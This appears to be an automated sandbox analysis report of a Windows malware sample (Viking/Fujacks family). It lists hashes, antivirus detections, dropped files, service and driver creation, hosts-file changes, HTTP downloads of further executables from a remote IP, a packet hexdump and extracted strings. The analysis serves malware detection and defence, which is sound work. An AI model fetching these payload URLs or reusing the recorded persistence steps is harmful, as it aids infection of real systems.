Analysis Date2015-02-01 12:49:07
MD546a44eb0c26fa16edd77f1d67b3012bc
SHA156b7e4d84be81463149a52a52f596e175e8e1334

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 543c472fb747a2f81b6c84c3848f5c0e sha1: 085b9fe590f0f20153b1d70d1f95563db2632575 size: 90112
Section.rdata md5: 16cefbcab73e2a4f926ecf5629491e1a sha1: 23bd5dba5d8376ac6b2f2c82c7f375f9c92bcc05 size: 24576
Section.data md5: f60d59ab0e05ad55771a5e8a05fd580b sha1: 8a0fbf7dbdf3f604bea6ec23060fe922421aed58 size: 8192
Section.rsrc md5: ee68a26e0bd3388aabad9b15b2bdc7e6 sha1: 01efc953b7c36e2117c83809e91cb16e10bd2299 size: 24576
Section.tcE md5: 8de3345e6f95cbf34cbc6503e70dd6c7 sha1: 0614301071b4602b424e8c0f2c4b6c67fd51572c size: 28672
Timestamp2006-08-22 11:01:08
VersionLegalCopyright: VentonSoft 版权所有 (C) 2006
InternalName: Startup
FileVersion: 1, 0, 0, 1
ProductName: Startup 应用程序
ProductVersion: 1, 0, 0, 1
FileDescription: Startup Microsoft 基础类应用程序
OriginalFilename: Startup.EXE
PEhash20b4f9be7dae302b28c61eec8c5c398a75a3a939
IMPhashfc3c4a62c317db534b9657097c19cffc
AV360 SafeVirus.Win32.Agent.O
AVAd-AwareWin32.Viking.AR
AVAlwil (avast)Viking-CF:Win32:Viking-CF
AVArcabit (arcavir)Win32.Viking.AR
AVAuthentiumW32/Viking.A.gen!Eldorado
AVAvira (antivir)W32/Fujacks.DR
AVBullGuardWin32.Viking.AR
AVCA (E-Trust Ino)Win32/Viking.D
AVCAT (quickheal)W32.Agent.DP
AVClamAVWorm.Fujack-55
AVDr. WebWin32.HLLW.Autoruner.8224
AVEmsisoftWin32.Viking.AR
AVEset (nod32)Win32/Agent.DP virus
AVFortinetW32/Fujacks.BF!tr
AVFrisk (f-prot)W32/Viking.A.gen!Eldorado
AVF-SecureWin32.Viking.AR
AVGrisoft (avg)Win32/Fujacks.S
AVIkarusTrojan-Downloader.Win32.Jadtre
AVK7Virus ( 00108a531 )
AVKasperskyVirus.Win32.Agent.dp
AVMalwareBytesno_virus
AVMcafeeW32/Fujacks.ay
AVMicrosoft Security EssentialsVirus:Win32/Viking.NK
AVMicroWorld (escan)Win32.Viking.AR
AVRisingWin32.Agent.hn
AVSophosW32/FuzVir-A
AVSymantecW32.Loorp.A!inf
AVTrend MicroPE_JEEFO.D
AVVirusBlokAda (vba32)Virus.Win32.Koklek

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"

Creates FileC:\WINDOWS\system32\dllcache\lsasvc.dll
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Creates FilePIPE\SfcApi
Creates FilePIPE\wkssvc
Creates FileC:\WINDOWS\system32\qmgr.dll
Creates FileC:\WINDOWS\system32\mspmsnsv.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Creates Process"C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Starts ServiceWmdmPmSN

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 808

Process
↳ Pid 856

Process
↳ C:\WINDOWS\System32\svchost.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝
2
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FilePIPE\DAV RPC SERVICE
Creates FileC:\WINDOWS\system32\drivers\etc\hosts
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\49I3WDU3\desktop.ini
Creates FileNtHid
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates FileC:\Documents and Settings\NetworkService\Cookies\index.dat
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\2FAD4H8P\desktop.ini
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\T1G8NVWY\desktop.ini
Creates FilePIPE\wkssvc
Creates FileC:\malware.exe
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\TEMP\NtHid.sys
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\4KLJ86GH\desktop.ini
Creates FileC:\WINDOWS\system32\WBEM\Logs\wbemess.log
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\WINDOWS\TEMP\NtHid.sys
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Creates Mutexc:!documents and settings!networkservice!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!networkservice!cookies!
Creates Mutexc:!documents and settings!networkservice!local settings!temporary internet files!content.ie5!
Creates ServiceNtHid - C:\WINDOWS\TEMP\NtHid.sys
Winsock DNS204.11.56.45
Winsock DNS192.168.1.1
Winsock DNSwww.490a-B8B5-9B8C1E870B0C.com
Winsock DNSwww.baidu.com
Winsock DNSpc1.114central.com

Process
↳ Pid 1112

Process
↳ C:\WINDOWS\system32\spoolsv.exe

RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝
7
RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝
NULL
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝
C:\WINDOWS\System32\spool\PRINTERS\\x00
Creates FileWMIDataDevice

Process
↳ Pid 1852

Process
↳ Pid 1148

Network Details:

DNSwww.a.shifen.com
Type: A
180.76.3.151
DNSpc1.114central.com
Type: A
204.11.56.45
DNSnbtj.114anhui.com
Type: A
DNSwww.baidu.com
Type: A
DNSwww.490a-B8B5-9B8C1E870B0C.com
Type: A
HTTP GEThttp://204.11.56.45/nbok01/dnfTT.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://204.11.56.45/nbok01/tlTT.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://204.11.56.45/nbok01/RXCQTT.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1033 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1034 ➝ 204.11.56.45:80

Raw Pcap
0x00000000 (00000)   47455420 2f6e626f 6b30312f 646e6654   GET /nbok01/dnfT
0x00000010 (00016)   542e6578 65204854 54502f31 2e300d0a   T.exe HTTP/1.0..
0x00000020 (00032)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x00000030 (00048)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000040 (00064)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000050 (00080)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000060 (00096)   6f777320 4e542035 2e313b20 5356313b   ows NT 5.1; SV1;
0x00000070 (00112)   202e4e45 5420434c 5220322e 302e3530    .NET CLR 2.0.50
0x00000080 (00128)   37323729 0d0a486f 73743a20 3230342e   727)..Host: 204.
0x00000090 (00144)   31312e35 362e3435 0d0a436f 6e6e6563   11.56.45..Connec
0x000000a0 (00160)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000b0 (00176)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f6e626f 6b30312f 746c5454   GET /nbok01/tlTT
0x00000010 (00016)   2e657865 20485454 502f312e 300d0a41   .exe HTTP/1.0..A
0x00000020 (00032)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000030 (00048)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000040 (00064)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000050 (00080)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000060 (00096)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000070 (00112)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x00000080 (00128)   3237290d 0a486f73 743a2032 30342e31   27)..Host: 204.1
0x00000090 (00144)   312e3536 2e34350d 0a436f6e 6e656374   1.56.45..Connect
0x000000a0 (00160)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000b0 (00176)   0a0d0a0a                              ....

0x00000000 (00000)   47455420 2f6e626f 6b30312f 52584351   GET /nbok01/RXCQ
0x00000010 (00016)   54542e65 78652048 5454502f 312e300d   TT.exe HTTP/1.0.
0x00000020 (00032)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000030 (00048)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000040 (00064)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000050 (00080)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000060 (00096)   646f7773 204e5420 352e313b 20535631   dows NT 5.1; SV1
0x00000070 (00112)   3b202e4e 45542043 4c522032 2e302e35   ; .NET CLR 2.0.5
0x00000080 (00128)   30373237 290d0a48 6f73743a 20323034   0727)..Host: 204
0x00000090 (00144)   2e31312e 35362e34 350d0a43 6f6e6e65   .11.56.45..Conne
0x000000a0 (00160)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000b0 (00176)   650d0a0d 0a                           e....


Strings
-
\
 
00-+ 
.
\
.
e
. 
-E-0
-0
0
0...........?- 
0
0
0 
?
u
 (*.*)
080404b0
 %1 
1, 0, 0, 1
%1: %2
 %2 
 255 
A9A9AZA
accChild
accChildCount
accDefaultAction
accDescription
accDoDefaultAction
accFocus
accHelp
accHelpTopic
accHitTest
accKeyboardShortcut
accLocation
accName
accNavigate
accParent
accRole
accSelect
accSelection
accState
accValue
 (C) 2006
 DLL 
FILE
FileDescription
FileVersion
 GUID
                                 H
         (((((                  H
(&H)
         h((((                  H
        h((((                  H
 INI 
InternalName
jjjjj
LegalCopyright
@mAmAmA
MS Shell Dlg
(&N)
(null)
OriginalFilename
ProductName
ProductVersion
 %s 
Startup
 Startup
Startup 
Startup 1.0 
 Startup(&A)...
Startup.EXE
Startup Microsoft 
StringFileInfo
TODO: 
Translation
VarFileInfo
VentonSoft 
VS_VERSION_INFO
^(_^[]
^(_^][
***###
\\\"""
\\\"""""""""
\\\\\\
0,0A0^0s0
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
08101BB
0j/0@0E0R0f0
0L0P0T0X0\0`0d0h0l0p0t0x0|
0UUUUW
1.1E1K1Z1h1
:1G1P1
1#QNAN
-1 -%s
1#SNAN
2(2B2N2V
2<2Q{h2p2
2?3H3Q
?%?2?]?a
2D2J2O2U2b1n
>)>2>E>S>\>s>
2K2f2v2
2T2d2{2
2#x/wcE
#32768
3$30l3X
343=3B3j3p3|3
;3D;H;L
@3T3e3
4&414]4
444WWW
490a-B8B5-9
49-E88E-4c47-98DC
4aaf-A336-C255
+4G4z4
4Q5e5x
;!;+;5;?;
5$5)56Ab5t5
5!6&6/6wm
:5:F:Y:w:|:
6.6:6C6M6W6\6
6<6]6i6
6!71767D7R7^7i7p7
&>6>Cg
7 0+020e0k0
7.{645FF040
7FC663
7@ip:K
?7N7T7]
8-00AA
@.&'85
-8<8^8
>!>*>8>B>H>
9*:/$:
954E}K
@\96DBA2^
9&9/9>
9 9[9`9g9m9s9~9
9ao^@q
9~du"h
#9!gmg
9~Lu	P
9Q9e9o9{9
9.:U:p:}:
<A|2<Z
A67-586
?A8qqn
aaa   
   AAA
AAA888888
A buffer overrun has been detected which has corrupted the program's
AdjustWindowRectEx
ADVAPI32.dll
AE4C57'
AfxControlBar70s
AfxFrameOrView70s
AfxMDIFrame70s
AfxOldWndProc423
AfxOleControl70s
AfxWnd70s
agX \s
a Play
appmgmts.dlld
A security error of unknown cause has been detected which has
.?AUCThreadData@@
August
.?AUIAccessible@@
.?AUIAccessibleProxy@@
.?AUIAtlStringMgr@ATL@@
.?AUIDispatch@@
.?AUIOleWindow@@
.?AUIUnknown@@
.?AV_AFX_BASE_MODULE_STATE@@
.?AV_AFX_HTMLHELP_STATE@@
.?AVAFX_MODULE_STATE@@
.?AVAFX_MODULE_THREAD_STATE@@
.?AV_AFX_THREAD_STATE@@
.?AVCAccessibleProxy@ATL@@
.?AVCAfxStringMgr@@
.?AVCArchiveException@@
.?AVCByteArray@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCComObjectRootBase@ATL@@
.?AV?$CComObjectRootEx@VCComSingleThreadModel@ATL@@@ATL@@
.?AVCDC@@
.?AVCException@@
.?AVCGdiObject@@
.?AVCHandleMap@@
.?AVCInvalidArgException@@
.?AVCMapPtrToPtr@@
.?AVCMemoryException@@
.?AVCMenu@@
.?AV?$CMFCComObject@VCAccessibleProxy@ATL@@@@
.?AVCNoTrackObject@@
.?AVCNotSupportedException@@
.?AVCObject@@
.?AVCOleException@@
.?AVCResourceException@@
.?AVCSimpleException@@
.?AVCTestCmdUI@@
.?AVCUserException@@
.?AVCWinApp@@
.?AVCWinThread@@
.?AVCWnd@@
.?AVexception@@
.?AV?$IAccessibleProxyImpl@VCAccessibleProxy@ATL@@@ATL@@
.?AVlength_error@std@@
.?AVlogic_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
.?AVXAccessible@CWnd@@
.?AVXAccessibleServer@CWnd@@
<A|@<Z
{{{BBB
BBBCCC
"bd	WVS
browser
Buffer overrun detected!
C0M0W0
C1E870B0C
CallNextHookEx
CallWindowProcA
CancelConne
 cannot be run i
CArchiveException
CByteArray
CCmdTarget
CException
CGdiObject
ch6q[@
CheckMenuItem
CInvalidArgException
C;J;P;Z;d;n;x;
ClientToScreen
CloseHandle
ClosePrinter
CMapPtrToPtr
CMemoryException
CNotSupportedException
CObject
COleException
COMCTL32.dll
COMCTL32.DLL
comdlg32.dll
commctrl_DragListMsg
commdlg_FindReplace
continue execution and must now be terminated.
Control Panel\Desktop\ResourceLocale
ConvertDefaultLocale
CopyRect
Copyro
CorExitProcess
corrupted the program's internal state.  The program cannot safely
[CP<Z<|<
CreateBitmap
CreateFileA
CreateProcessA
CreateStdAccessibleObject
CreateWindowExA
CResourceException
crypt'c
CUserException
CWinApp
CWinThread
DA-6D69-472e-8981-DBC71
@.data
dddd, MMMM dd, yyyy
December
default
DefWindowProcA
Delete
DeleteCriticalSection
DeleteDC
DeleteObject
DestroyMenu
DestroyWindow
(D/fc_oL
DispatchMessageA
DISPLAY
dOCe""""""""""""
DocumentPropertiesA
DOMAIN error
DOS mode.
DrawTextA
DrawTextExA
dU5 B~
=&=,=D=v=
,+&E2(s@)w1
E8J8O8[8`8i8o8z8
ech1Y%
>>>eee
EnableMenuItem
EnableWindow
EnterCriticalSection
EnumDisplayDevicesA
EnumDisplayMonitors
EnumResourceLanguagesA
ep1'*"/
eParam$
Escape
Esht*6
ExecuUA
ExitProcess
Expor.exe
ExtTextOutA
F??3@YAXP
F,98uX
F\9~Lu)h
f+D?	D
February
F,+F(_;E
;;;FFF
///fff\\\hhhZZZ
F(@@;F,v
	_fh.f(4J
FindResourceA
- floating point not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FlushFileBuffers
ForceRemove
FormatMessageA
;F(r(8_
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeLibrary
Friday
[/fS_MR
GAIsProcessorFeaturePresent
g~b1Y%
GDI32.dll
GetACP
GetActiveWindow
GetCapture
GetClassInfoA
GetClassInfoExA
GetClassLongA
GetClassNameA
GetClientRect
GetClipBox
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThread
GetCurrentThreadId
GetCursorPos
GetDeviceCaps
GetDlgCtrlID
GetDlgItem
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetFocus
GetForegroundWindow
GetKeyState
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetMenu
GetMenuCheckMarkDimensions
GetMenuItemCount
GetMenuItemID
GetMenuState
GetMessageA
GetMessagePos
GetMessageTime
GetModuleFileNameA
GetModuleHandleA
GetMonitorInfoA
GetOEMCP
GetParent
GetProcAddress
GetProcessWindowStation
GetPropA
GetStartupInfoA
GetStdHandle
GetStockObject
GetStringTypeA
GetStringTypeW
GetSubMenu
GetSysColor
GetSysColorBrush
GetSystemDefaultUILanguage
GetSystemInfo
GetSystemMetrics
GetSystemTimeAsFileTime
GetTempPathA
GetThreadLocale
GetTickCount
GetTopWindow
GetUserDefaultUILanguage
GetUserObjectInformationA
GetVersion
GetVersionExA
GetWindow
GetWindowLongA
GetWindowPlacement
GetWindowRect
GetWindowTextA
G[&fM4
GlobalAddAtomA
GlobalAlloc
GlobalDeleteAtom
GlobalFindAtomA
GlobalFlags
GlobalFree
GlobalGetAtomNameA
GlobalHandle
GlobalLock
GlobalReAlloc
GlobalUnlock
GrayStringA
`h````
h1l1.T
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
hhctrl.ocx
HH:mm:ss
HHt`HHt\
HHtjHHtF
HrCg@b	g 
HtmlHelpA
Hur3'$
ifyTrLo
igVCRT
???III
InfGma
ingCompatibil
InitializeCriticalSection
InitializeCriticalSectionAndSpinCount
InstallDir
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
internal state.  The program cannot safely continue execution and must
invalid string position
IsBadCodePtr
IsBadReadPtr
IsBadWritePtr
IsIconic
IsWindowEnabled
IsWindowVisible
i|tlh`
IV&iS9
IXR-!m
j3a]n!e-BN
JanFebMarAprMayJunJulAugSepOctNovDec
January
jiayue
jjj<<<
jjj222
 -k 4/
k8|9~S"
kBe%]=
kca:\lsa
KERNEL32
kernel32.dll
KERNEL32.dll
KERNEL32.DLL
KEveny
K:\Q.pdb`q
@kZ))(&
L5PFHP7b
l888888WWWWWWwww
"lb5q]@
LCMapStringA
LCMapStringW
LeaveCriticalSection
l	g~b0R
l	g~b0R 
LoadBitmapA
LoadCursorA
LoadIconA
LoadLibraryA
LoadResource
LocalAlloc
LocalFree
LocalReAlloc
LockResource
lp6a J
LresultFromObject
lstrcatA
lstrcmpA
lstrcmpiA
lstrcmpW
lstrcpyA
lstrcpynA
lstrlenA
L$Xh4uA
m1\U\Kc
M3B<J<
MachineType
MapWindowPoints
M:d:m:
MessageBoxA
Microsoft Visual C++ Runtime Library
mllD<9
MM/dd/yy
ModifyMenuA
Monday
MonitorFromPoint
MonitorFromRect
MonitorFromWindow
mscoree.dll
MSN Gam
MSVCRT.dll
MSWHEEL_ROLLMSG
MultiByteToWideChar
N/f@b	g
-N"N1Y
N*Ncktepe
N*N*g}T
N*Ntepe
N*N(W 
NoBackButton
NoClose
NoDrives
NoEntireNetwork
NoFileMru
NoNetConnectDisconnect
NoPlacesBar
NoRecentDocsHistory
NoRemove
- not enough space for arguments
- not enough space for environment
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
NotifyWinEvent
November
now be terminated.
 NT\Curr
ntdll.dll
NtQu9y
(null)
Nv`mG}
[O&&&&
Obb'A/
October
OffsetViewportOrgEx
oft\Wud
oG<-uK
ole32.dll
OLEACC.dll
OLEAUT32.dll
o@P3e4
Op-;4$
~OPEN=-
OpenPrinterA
+OpsSCM
|otB.8
OX[0R 
PathFileExistsA
PathFindExtensionA
PathFindFileNameA
.PAVCArchiveException@@
.PAVCException@@
.PAVCInvalidArgException@@
.PAVCMemoryException@@
.PAVCObject@@
.PAVCOleException@@
.PAVCSimpleException@@
.PAVCUserException@@
PeekMessageA
>P?e?k?
PGZ"""
Please contact the application's support team for more information.
P!oOh!{
PostMessageA
PostQuitMessage
PPPPPPPP
ppxxxx
PreviewPages
Program: 
<program name unknown>
PtInRect
PtVisible
- pure virtual function call
pVKwOf
PWVWWW
q$A3<.
Q\\\\\\H
qidu.com
qInitCommonControlsEx
QQQQQQQ
QQSUVW
QQSVW3
QQSVWd
QueryPerformanceCounter
QX[gbL
\Ra7207
RaiseException
 `.rdat[
`.rdata
ReadFile
RealChina
RectVisible
RECYCLER
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyA
RegisterClassA
RegisterWindowMessageA
RegOpenKeyA
RegOpenKeyExA
RegQueryValueA
RegQueryValueExA
RegSetValueExA
ReleaseDC
Remote
RemovePropA
RestoreDC
RestrictRun
_rju@_fd
-<RoA%'_h7
RSbpS\O
RtlImV
RtlUnwind
runtime error 
Runtime Error!
S\_^[]
S1[1`1m1
Saturday
SaveDC
ScaleViewportExtEx
ScaleWindowExtEx
{schedsvc
%s.dll
SDPSRV
SelectObject
SendMessageA
September
SetBkColor
SetCursor
SetErrorMode
SetFilePointer
SetForegroundWindow
SetHandleCount
SetLastError
SetMapMode
SetMenuItemBitmaps
SetPropA
SetStdHandle
SetTextColor
Settings
SetUnhandledExceptionFilter
SetViewportExtEx
SetViewportOrgEx
SetWindowExtEx
SetWindowLongA
SetWindowPos
SetWindowsHookExA
SetWindowTextA
SHELL32.dll
SHLWAPI.dll
ShowWindow
SING error
SizeofResource
@socIII
software
Software\
SOFTWARE\Lenovo
SOFTWARE\Mi
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
SOFTWARE\RealLenovo\Shell
SOFTWARE\RealLenovo\Update
Sp`FFF
s.q$X8
sSpecl'
string too long
Sunday
SunMonTueWedThuFriSat
s_/UYY
sVS;7|B;w
SVWj ^
SVWj(3
swsocknetman1ssdp
SymbgTLOkN
SystemParametersInfoA
t2WWVPVSW
t	9p$u
TabbedTextOutA
.tcLCI0
tD9wdt?
TerminateProcess
TextOutA
.textVT
T/f&Tcknx
tG9|$8r
+t"HHt
- This application cannot run using the active version of the Microsoft .NET Runtime
This application has requested the Runtime to terminate it in an unusual way.
_This #g
!This program cannot be run in DOS mode.
Thursday
T;_;i;z;
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
tLSh]2A
TlsSetValue
tl`TDi
ToFilnH
TranslateMessage
T$$RSP
t!SS9]
t#SSUP
tTisrv
T$tSUV3
t.;t$$t(
t$<"u	3
Tuesday
t$$VSS
?%_#txg
>"u:F@
u@h^GA
u;j0^V
	U;MhOy
uMpr.{
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UnhookWindowsHookEx
Unknown exception
Unknown security failure detected!
UnregisterClassA
#upnphostKn&s
URLDown
USER32
user32.dll
USER32.dll
u>Sh\uA
utpqmj6/,
@;v;{;
V3_3o3x3
V6sion\
v7Os2_qWSArcvF
ValidateRect
VC20XC00U
vieAak:m
VirtualAlloc
VirtualFree
VirtualProtect
VirtualQuery
v	N+D$
V>`>n>t>
vThfad
VWh^GA
VWumh4
\v:.X$
W0YX0wx
W2c2l2x2
|w9=trW*
Wednesday
w;hDdk h$
w\h^GA
WideCharToMultiByte
WinHelpA
WINSPOOL.DRV
 winsta0
/WithTag	
WmdmPmSN'Fa
WO$_9E
Writea7
WriteFile
WritePrivateProfileStringA
wsprintfA
WtuHHt
WWWWVSW
<	=x=}=
 X -ibcB"
<)<.<X<i<o
xmlpbS
XPTPSW
XPVSSG
XRichS
xV.#"h
XX; tg
;/;%y;~;
.y!GN&
|/Yr3Y
/YW'RB
|ywtqp
YX[(W	
_^][YY
YYY999
yyyBBBBBB
."z0~gG
ZpRich
Z/@(SW
@z}]u2o